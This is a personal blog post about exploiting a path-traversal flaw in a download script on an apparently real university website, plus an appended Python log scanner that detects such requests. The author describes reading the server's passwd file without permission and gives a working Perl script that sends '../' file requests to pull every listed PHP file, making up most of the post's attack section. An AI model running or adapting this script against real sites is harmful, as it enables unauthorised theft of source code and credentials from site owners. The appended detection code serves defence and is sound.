Script source code disclosure could mean full compromise

Hello,

I have been playing lately with the security of some websites, since it was extremely boring after finishing my exams to have nothing better to do... Yeah, I know I still have to finish the CCNA course and get that over with, but call me lazy, I’ve wasted a lot of valuable time 😦

Never mind that for a second; what I bring to you today is a closer look at website security and what a simple human error could do to your website.

Take for example our website today, http://vulnerable.edu.xx [link kept private because... well, I might have some black hat touch here, but I still don’t want anyone to compromise the website for fun! As we all know, it was always for “educational purposes only” :D]. The website appeared to be vulnerable to script source code disclosure, which enabled me to get a copy of every single file on the website that appeared in my crawler, including the famous ‘passwd’ file [unfortunately the passwords were kept encrypted in the ‘shadow’ file 😦; it wasn’t hard to guess the path once I had the ability to get any file :)]

So with some fast, dirty Perl code I wrote in a rush (it took me about half an hour to learn some basics) I managed to download a copy of my beloved PHP files that were located on that host 🙂

use LWP 5.64;
use strict;
use File::Basename;

my $browser = LWP::UserAgent->new;

open (handle, 'files.txt');
mkdir "site";
chdir "./site";
while (<handle>) {
    chomp;
    my ($filename,$directories) = fileparse("$_");
    my @dir = split('/',$directories);
    my $i = 0;
    while ($dir[$i]) {
        mkdir $dir[$i];
        chdir './'.$dir[$i];
        $i = $i + 1;
    }
    $i = $i - 1;

    my $url = 'http://vulnerable.edu.xx/common/download.php?';
    $url .= 'fileName=../' . $directories . $filename;
    print "working on " . $url ."\n";

    my $response = $browser->get($url);
    die "Can't get $url -- ", $response->status_line
    unless $response->is_success;
    die "Hey I was expecting PHP, not ", $response->content_type
    unless $response->content_type eq 'application/download';

    open (file, '>'.$filename) or die "Can't create file '$filename'";
    print file $response->content;
    close(file);

    print "saving " . $directories . $filename . "\n";

    for ($i; $i >= 0; $i--) {
        chdir('../');
    }
}

Just an example, one of the folders :)

Let’s hope it’s not your site 😀
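
A defender-side view of the requests described above, as an added example that is not part of the original post: it scans web access logs for `fileName` values that climb out of the download directory, including percent-encoded and double-encoded forms, and counts them per client. The log lines, IP addresses and function names are constructed for illustration; only the `/common/download.php?fileName=` pattern comes from the post.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2010:10:01:02 +0000] "GET /common/download.php?fileName=forms/apply.pdf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2010:10:02:10 +0000] "GET /common/download.php?fileName=../index.php HTTP/1.1" 200 4312 "-" "libwww-perl/5.64"
203.0.113.9 - - [12/Mar/2010:10:02:11 +0000] "GET /common/download.php?fileName=%2e%2e%2fcommon/config.php HTTP/1.1" 200 911 "-" "libwww-perl/5.64"
203.0.113.9 - - [12/Mar/2010:10:02:12 +0000] "GET /common/download.php?fileName=%252e%252e%252fadmin/login.php HTTP/1.1" 200 2048 "-" "libwww-perl/5.64"
198.51.100.7 - - [12/Mar/2010:10:05:00 +0000] "GET /news.php?id=3 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded '..' (%252e) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(name):
    """True if the requested name would escape the download directory."""
    name = fully_decode(name).replace("\\", "/")
    return name.startswith("/") or "\x00" in name or ".." in name.split("/")

def find_traversal(log_text, param="fileName"):
    """Return (hits, per_client_counts) for requests whose file parameter traverses."""
    hits, per_client = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        # parse_qsl decodes once; is_traversal keeps decoding until stable.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and is_traversal(value):
                hits.append((client, url.path, fully_decode(value), int(status)))
                per_client[client] += 1
    return hits, per_client

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG)[0]:
        print(hit)
```

A 200 status on a flagged request means the file was most likely served, so those hits are the ones to treat as disclosure rather than as a blocked attempt.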
